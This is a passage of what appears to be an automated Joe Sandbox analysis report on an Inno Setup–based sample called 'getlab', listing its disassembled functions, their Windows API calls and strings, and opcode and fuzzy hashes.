                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: AddressByteCharMultiProcWide
                                                                          • String ID: SfcIsFileProtected$sfc.dll
                                                                          • API String ID: 2508298434-591603554
                                                                          • Opcode ID: e7edbd208805aa306e5bb6f456733d4c36fbf9170141b95da0f44c83ccf47135
                                                                          • Instruction ID: 176d29f9623cbc30a6d26dfc77e51d4098360506d5c3757ea1f9e8bf8263b863
                                                                          • Opcode Fuzzy Hash: e7edbd208805aa306e5bb6f456733d4c36fbf9170141b95da0f44c83ccf47135
                                                                          • Instruction Fuzzy Hash: 21416670A04218ABE720EB55DC86B9E77B8EB44309F5041B7E908A7293D7785F89CF5C
                                                                          Function 0042ED30 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 55libraryloaderCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SHAutoComplete.SHLWAPI(00000000,00000001), ref: 0042EDBD
                                                                            • Part of subcall function 0042D8BC: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8CF
                                                                            • Part of subcall function 0042E38C: SetErrorMode.KERNEL32(00008000), ref: 0042E396
                                                                            • Part of subcall function 0042E38C: LoadLibraryA.KERNEL32(00000000,00000000,0042E3E0,?,00000000,0042E3FE,?,00008000), ref: 0042E3C5
                                                                          • GetProcAddress.KERNEL32(00000000,SHAutoComplete), ref: 0042EDA0
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: AddressAutoCompleteDirectoryErrorLibraryLoadModeProcSystem
                                                                          • String ID: SHAutoComplete$shlwapi.dll
                                                                          • API String ID: 395431579-1506664499
                                                                          • Opcode ID: 07c44bdcd03860b1f33b3045299bb1d0449c98b3a7b2341f9148d4efe18bbe9e
                                                                          • Instruction ID: abd39ea96fbc8e8598eec473428a27bf92d63543bd8a2491ee7d7de58c90140d
                                                                          • Opcode Fuzzy Hash: 07c44bdcd03860b1f33b3045299bb1d0449c98b3a7b2341f9148d4efe18bbe9e
                                                                          • Instruction Fuzzy Hash: B1117330B00319BFD711EB62ED85B8E7BA8EB55704F90407BF400A6691D778AE05865D
                                                                          Function 004559E4 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 41registryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 0042DE14: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,0048319F,?,00000001,?,?,0048319F,?,00000001,00000000), ref: 0042DE30
                                                                          • RegCloseKey.ADVAPI32(?,00455A4F,?,00000001,00000000), ref: 00455A42
                                                                          Strings
                                                                          • PendingFileRenameOperations, xrefs: 00455A14
                                                                          • PendingFileRenameOperations2, xrefs: 00455A23
                                                                          • SYSTEM\CurrentControlSet\Control\Session Manager, xrefs: 004559F0
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: CloseOpen
                                                                          • String ID: PendingFileRenameOperations$PendingFileRenameOperations2$SYSTEM\CurrentControlSet\Control\Session Manager
                                                                          • API String ID: 47109696-2115312317
                                                                          • Opcode ID: bdd8c77769c6bad55690eeddcdbd75d9d8896b7276d3d2e2d12af9b25540c28f
                                                                          • Instruction ID: 0e3b4bd859061d9736a48b3f0c398de546ea7d73752f370084b2b16911b021d7
                                                                          • Opcode Fuzzy Hash: bdd8c77769c6bad55690eeddcdbd75d9d8896b7276d3d2e2d12af9b25540c28f
                                                                          • Instruction Fuzzy Hash: 31F09671744A08EFDB04D6A6DC62E7A739DD744711FA04477F800D7682DA7DAD04962C
                                                                          Function 0047F340 Relevance: 6.1, APIs: 4, Instructions: 147fileCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • FindNextFileA.KERNEL32(000000FF,?,?,?,?,00000000,0047F539,?,00000000,00000000,?,?,00480749,?,?,00000000), ref: 0047F3E6
                                                                          • FindClose.KERNEL32(000000FF,000000FF,?,?,?,?,00000000,0047F539,?,00000000,00000000,?,?,00480749,?,?), ref: 0047F3F3
                                                                          • FindNextFileA.KERNEL32(000000FF,?,00000000,0047F50C,?,?,?,?,00000000,0047F539,?,00000000,00000000,?,?,00480749), ref: 0047F4E8
                                                                          • FindClose.KERNEL32(000000FF,0047F513,0047F50C,?,?,?,?,00000000,0047F539,?,00000000,00000000,?,?,00480749,?), ref: 0047F506
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: Find$CloseFileNext
                                                                          • String ID:
                                                                          • API String ID: 2066263336-0
                                                                          • Opcode ID: b461a46803c2cc4ea78060a2329edfdb5f867b3d72b18562307b1542635c1f41
                                                                          • Instruction ID: 93840f20d66fcb2e286325320114c4d74e835c6895e54ad5a4f30f132b089a3b
                                                                          • Opcode Fuzzy Hash: b461a46803c2cc4ea78060a2329edfdb5f867b3d72b18562307b1542635c1f41
                                                                          • Instruction Fuzzy Hash: 19512F71A00658AFCB21DF65CC45ADEB7B8EB48319F5084BAA818E7341D7389F49CF54
                                                                          Function 0042126C Relevance: 6.1, APIs: 4, Instructions: 127windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetMenu.USER32(00000000), ref: 00421359
                                                                          • SetMenu.USER32(00000000,00000000), ref: 00421376
                                                                          • SetMenu.USER32(00000000,00000000), ref: 004213AB
                                                                          • SetMenu.USER32(00000000,00000000), ref: 004213C7
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: Menu
                                                                          • String ID:
                                                                          • API String ID: 3711407533-0
                                                                          • Opcode ID: 2199c62fdc40b6f857ca540156f476da1cd3d0498d35d1cb2f117de972eee6cd
                                                                          • Instruction ID: 7bb7859a2cdb5f88754e70ccfd218d349751ef7fdbf43141b5448ef52fdf7b61
                                                                          • Opcode Fuzzy Hash: 2199c62fdc40b6f857ca540156f476da1cd3d0498d35d1cb2f117de972eee6cd
                                                                          • Instruction Fuzzy Hash: 0141B03070025456EB20EB3AA8857AB36D64F61308F4856BFBC44DF7A3CA7CCC5583A9
                                                                          Function 00416B3A Relevance: 6.1, APIs: 4, Instructions: 67windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SendMessageA.USER32(?,?,?,?), ref: 00416B7C
                                                                          • SetTextColor.GDI32(?,00000000), ref: 00416B96
                                                                          • SetBkColor.GDI32(?,00000000), ref: 00416BB0
                                                                          • CallWindowProcA.USER32(?,?,?,?,?), ref: 00416BD8
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: Color$CallMessageProcSendTextWindow
                                                                          • String ID:
                                                                          • API String ID: 601730667-0
                                                                          • Opcode ID: c8424e95f6d781db4325e6c83d9f419e4623fd2ec4a9fd1ab852655791a28026
                                                                          • Instruction ID: 029c09512e86dc7a5584eefc6ebe6d25086567911d505253220d4c4c80a1b89b
                                                                          • Opcode Fuzzy Hash: c8424e95f6d781db4325e6c83d9f419e4623fd2ec4a9fd1ab852655791a28026
                                                                          • Instruction Fuzzy Hash: D4114FB5304604AFD720EE6ECDC4E9777DCAF49310715882AB55ADB602C638F8418B39
                                                                          Function 00454F50 Relevance: 6.1, APIs: 4, Instructions: 54COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • WaitForInputIdle.USER32(?,00000032), ref: 00454F7C
                                                                          • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 00454F9E
                                                                          • GetExitCodeProcess.KERNEL32(?,?), ref: 00454FAD
                                                                          • CloseHandle.KERNEL32(?,00454FDA,00454FD3,?,?,?,00000000,?,?,004551AF,?,?,?,00000044,00000000,00000000), ref: 00454FCD
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: Wait$CloseCodeExitHandleIdleInputMultipleObjectsProcess
                                                                          • String ID:
                                                                          • API String ID: 4071923889-0
                                                                          • Opcode ID: 51238a3311eee55e88becd6a870e4e93586b22fb22ba4d0d147ea6b118d6571c
                                                                          • Instruction ID: ae4672943cd7382c52be368afd98a0e744302f00d430d4f9e0a97d6bd95691cc
                                                                          • Opcode Fuzzy Hash: 51238a3311eee55e88becd6a870e4e93586b22fb22ba4d0d147ea6b118d6571c
                                                                          • Instruction Fuzzy Hash: 9C01F931A006087EEB10979D8C02F5B7BACDB89764F610127F904DB2C2C5789D408A68
                                                                          Function 004230C0 Relevance: 6.1, APIs: 4, Instructions: 54COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • 73A1A570.USER32(00000000,?,?,00000000,?,00418FCB,00000000,?,?,?,00000001), ref: 00423116
                                                                          • EnumFontsA.GDI32(00000000,00000000,00423060,00410648,00000000,?,?,00000000,?,00418FCB,00000000,?,?,?,00000001), ref: 00423129
                                                                          • 73A24620.GDI32(00000000,0000005A,00000000,00000000,00423060,00410648,00000000,?,?,00000000,?,00418FCB,00000000), ref: 00423131
                                                                          • 73A1A480.USER32(00000000,00000000,00000000,0000005A,00000000,00000000,00423060,00410648,00000000,?,?,00000000,?,00418FCB,00000000), ref: 0042313C
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: A24620A480A570EnumFonts
                                                                          • String ID:
                                                                          • API String ID: 2630238358-0
                                                                          • Opcode ID: 9afbfd5fafda1dbd28af8ddef14be35d640b69e4e8358016454380424bd4bee6
                                                                          • Instruction ID: 69cee35535e214b40259e1ab78654d31e06b117eb7ed13cd681158bdd9fae355
                                                                          • Opcode Fuzzy Hash: 9afbfd5fafda1dbd28af8ddef14be35d640b69e4e8358016454380424bd4bee6
                                                                          • Instruction Fuzzy Hash: 2F01D2717442102AE700BF795CC6B9B36A4DF04318F40027BF808AB3C6D6BE9C0547AE
                                                                          Function 0045C084 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 166COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 00450900: SetEndOfFile.KERNEL32(?,?,0045C162,00000000,0045C2ED,?,00000000,00000002,00000002), ref: 00450907
                                                                          • FlushFileBuffers.KERNEL32(?), ref: 0045C2B9
                                                                          Strings
                                                                          • NumRecs range exceeded, xrefs: 0045C1B6
                                                                          • EndOffset range exceeded, xrefs: 0045C1ED
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: File$BuffersFlush
                                                                          • String ID: EndOffset range exceeded$NumRecs range exceeded
                                                                          • API String ID: 3593489403-659731555
                                                                          • Opcode ID: 3fff9631741ed1f89243f20ac6f917f34f78f9adab0a30c84fb990f9f9a0694f
                                                                          • Instruction ID: f1827e02de76a306a1886b93aefbbb2344be70999cb9be9d3c0cbcfad0efad24
                                                                          • Opcode Fuzzy Hash: 3fff9631741ed1f89243f20ac6f917f34f78f9adab0a30c84fb990f9f9a0694f
                                                                          • Instruction Fuzzy Hash: 35616334A002548FDB25DF25C891ADAB7B5AF49305F0084DAED88AB353D7749EC9CF54
                                                                          Function 004980B4 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 119COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 00403344: GetModuleHandleA.KERNEL32(00000000,004980C2), ref: 0040334B
                                                                            • Part of subcall function 00403344: GetCommandLineA.KERNEL32(00000000,004980C2), ref: 00403356
                                                                            • Part of subcall function 0040631C: GetModuleHandleA.KERNEL32(kernel32.dll,?,004980CC), ref: 00406322
                                                                            • Part of subcall function 0040631C: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0040632F
                                                                            • Part of subcall function 0040631C: GetProcAddress.KERNEL32(00000000,SetSearchPathMode), ref: 00406345
                                                                            • Part of subcall function 0040631C: GetProcAddress.KERNEL32(00000000,SetProcessDEPPolicy), ref: 0040635B
                                                                            • Part of subcall function 0040631C: SetProcessDEPPolicy.KERNEL32(00000001,00000000,SetProcessDEPPolicy,00000000,SetSearchPathMode,kernel32.dll,?,004980CC), ref: 00406366
                                                                            • Part of subcall function 00409B70: 6F551CD0.COMCTL32(004980D6), ref: 00409B70
                                                                            • Part of subcall function 0041094C: GetCurrentThreadId.KERNEL32 ref: 0041099A
                                                                            • Part of subcall function 00419038: GetVersion.KERNEL32(004980EA), ref: 00419038
                                                                            • Part of subcall function 0044F73C: GetModuleHandleA.KERNEL32(user32.dll,NotifyWinEvent,004980FE), ref: 0044F777
                                                                            • Part of subcall function 0044F73C: GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0044F77D
                                                                            • Part of subcall function 0044FBE4: GetVersionExA.KERNEL32(0049B790,00498103), ref: 0044FBF3
                                                                            • Part of subcall function 004531C4: GetModuleHandleA.KERNEL32(kernel32.dll,Wow64DisableWow64FsRedirection,00000000,0045325D,?,?,?,?,00000000,?,00498112), ref: 004531E4
                                                                            • Part of subcall function 004531C4: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 004531EA
                                                                            • Part of subcall function 004531C4: GetModuleHandleA.KERNEL32(kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000,0045325D,?,?,?,?,00000000,?,00498112), ref: 004531FE
                                                                            • Part of subcall function 004531C4: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00453204
                                                                            • Part of subcall function 00456ED4: GetProcAddress.KERNEL32(00000000,SHCreateItemFromParsingName), ref: 00456EF8
                                                                            • Part of subcall function 0046441C: LoadLibraryA.KERNEL32(shell32.dll,SHPathPrepareForWriteA,00498126), ref: 0046442B
                                                                            • Part of subcall function 0046441C: GetProcAddress.KERNEL32(00000000,shell32.dll), ref: 00464431
                                                                            • Part of subcall function 0046CC10: GetProcAddress.KERNEL32(00000000,SHPathPrepareForWriteA), ref: 0046CC25
                                                                            • Part of subcall function 004786B4: GetModuleHandleA.KERNEL32(kernel32.dll,?,00498130), ref: 004786BA
                                                                            • Part of subcall function 004786B4: GetProcAddress.KERNEL32(00000000,VerSetConditionMask), ref: 004786C7
                                                                            • Part of subcall function 004786B4: GetProcAddress.KERNEL32(00000000,VerifyVersionInfoW), ref: 004786D7
                                                                            • Part of subcall function 004950C0: RegisterClipboardFormatA.USER32(QueryCancelAutoPlay), ref: 004950D9
                                                                          • SetErrorMode.KERNEL32(00000001,00000000,00498178), ref: 0049814A
                                                                            • Part of subcall function 00497E74: GetModuleHandleA.KERNEL32(user32.dll,DisableProcessWindowsGhosting,00498154,00000001,00000000,00498178), ref: 00497E7E
                                                                            • Part of subcall function 00497E74: GetProcAddress.KERNEL32(00000000,user32.dll), ref: 00497E84
                                                                            • Part of subcall function 004244CC: SendMessageA.USER32(?,0000B020,00000000,?), ref: 004244EB
                                                                            • Part of subcall function 004242BC: SetWindowTextA.USER32(?,00000000), ref: 004242D4
                                                                          • ShowWindow.USER32(?,00000005,00000000,00498178), ref: 004981AB
                                                                            • Part of subcall function 00481B8C: SetActiveWindow.USER32(?), ref: 00481C3A
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: AddressProc$HandleModule$Window$Version$ActiveClipboardCommandCurrentErrorF551FormatLibraryLineLoadMessageModePolicyProcessRegisterSendShowTextThread
                                                                          • String ID: Setup
                                                                          • API String ID: 3870281231-3839654196
                                                                          • Opcode ID: c82cb4154b49966d52098e7678e9f8cbacc3d3e1a40bce85d329610fd5ea755b
                                                                          • Instruction ID: d0c772c7b00e67a50ac74b8b43c66aaf35bd51fc0d8445b6be8c1c392d06dbfc
                                                                          • Opcode Fuzzy Hash: c82cb4154b49966d52098e7678e9f8cbacc3d3e1a40bce85d329610fd5ea755b
                                                                          • Instruction Fuzzy Hash: 6E31A471208A409ED601BBB7ED53A293B98EF89B18B61447FF80482593DE3D5C158A7E
                                                                          Function 0042DBF8 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 113registryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,00000000,0042DD30), ref: 0042DC34
                                                                          • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,70000000,?,?,00000000,?,00000000,?,00000000,0042DD30), ref: 0042DCA4
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: QueryValue
                                                                          • String ID: 2H
                                                                          • API String ID: 3660427363-1900415311
                                                                          • Opcode ID: 14541883276540ac7989a720439aace4da052e0d2dc9232dcf0108ce5bd41f35
                                                                          • Instruction ID: 6f29e5db34dee79be2e4bdbc2feb63702d0df34b1de6f6cc3bdc936bcd48876b
                                                                          • Opcode Fuzzy Hash: 14541883276540ac7989a720439aace4da052e0d2dc9232dcf0108ce5bd41f35
                                                                          • Instruction Fuzzy Hash: 88414271E04529ABDB11DF95D881BAFB7B8EF05704FA18466E800F7241D778EE01CBA9
                                                                          Function 004539F8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 83COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • CreateDirectoryA.KERNEL32(00000000,00000000,?,00000000,00453AE7,?,?,00000000,0049B628,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00453A3E
                                                                          • GetLastError.KERNEL32(00000000,00000000,?,00000000,00453AE7,?,?,00000000,0049B628,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00453A47
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: CreateDirectoryErrorLast
                                                                          • String ID: .tmp
                                                                          • API String ID: 1375471231-2986845003
                                                                          • Opcode ID: 78f230c1c23ee00a09b91ad4e0d90e969b8545f4e864f0322f10b99bd95edb86
                                                                          • Instruction ID: 5c47afe113f3b23246b8f03ea8338b9bfcdda488aecdb3892d8cb76e5c942ae9
                                                                          • Opcode Fuzzy Hash: 78f230c1c23ee00a09b91ad4e0d90e969b8545f4e864f0322f10b99bd95edb86
                                                                          • Instruction Fuzzy Hash: 4A213374A00218ABDB01EFA5C8529DFB7B9EF48305F50457BE801B7342DA7C9F059BA9
                                                                          Function 0047BE88 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36registryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • RegCloseKey.ADVAPI32(?,?,00000001,00000000,?,?,?,0047C10E,00000000,0047C124,?,?,?,?,00000000), ref: 0047BEEA
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: Close
                                                                          • String ID: RegisteredOrganization$RegisteredOwner
                                                                          • API String ID: 3535843008-1113070880
                                                                          • Opcode ID: 27ab63dfb5301e991ca37986a8aa3ba83a7bb1c6c96b168b2a63f47a98e3c08c
                                                                          • Instruction ID: 7ba728e1ef3f38ce6dcb00f7549556e1698566df6bc9e7584ed9d3abf6b47640
                                                                          • Opcode Fuzzy Hash: 27ab63dfb5301e991ca37986a8aa3ba83a7bb1c6c96b168b2a63f47a98e3c08c
                                                                          • Instruction Fuzzy Hash: 2CF09060704244AFEB00E665DC92BEA33A9D745304F20803BE2048B392D779AE00CB5C
                                                                          Function 0046EC64 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34registryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • RegSetValueExA.ADVAPI32(?,Inno Setup: Setup Version,00000000,00000001,00000000,00000001,r_G,?,0049C1D0,?,0046EF7B,?,00000000,0046F516,?,_is1), ref: 0046EC87
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
